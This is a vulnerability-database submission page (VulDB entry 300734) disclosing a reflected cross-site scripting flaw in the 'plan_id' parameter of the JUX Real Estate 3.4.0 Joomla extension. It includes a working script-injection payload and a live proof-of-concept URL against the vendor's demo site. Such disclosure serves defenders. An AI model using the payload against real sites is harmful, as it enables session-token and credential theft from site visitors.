| Título | JoomlaUX JoomlaUX JUX Real Estate 3.4.0 Cross Site Scripting |
|---|
| Descripción | # Exploit Title: JUX Real Estate 3.4.0 - RXSS
# Exploit Author: Emano888
# Date: 10/03/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Impact: Manipulate the content of the site
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path:
/extensions/realestate/index.php/agents/agent-register/addagent
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
GET parameter 'plan_id' is vulnerable to XSS
https://[hostname]/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
Payload: "><sCrIpT>alert(1)</sCrIpT>
Live POC:
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| Fuente | ⚠️ https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| Usuario | Anonymous User |
|---|
| Sumisión | 2025-03-10 21:44 (hace 1 Año) |
|---|
| Moderación | 2025-03-24 12:36 (14 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 300734 [JoomlaUX JUX Real Estate 3.4.0 addagent plan_id secuencias de comandos en sitios cruzados] |
|---|
| Puntos | 20 |
|---|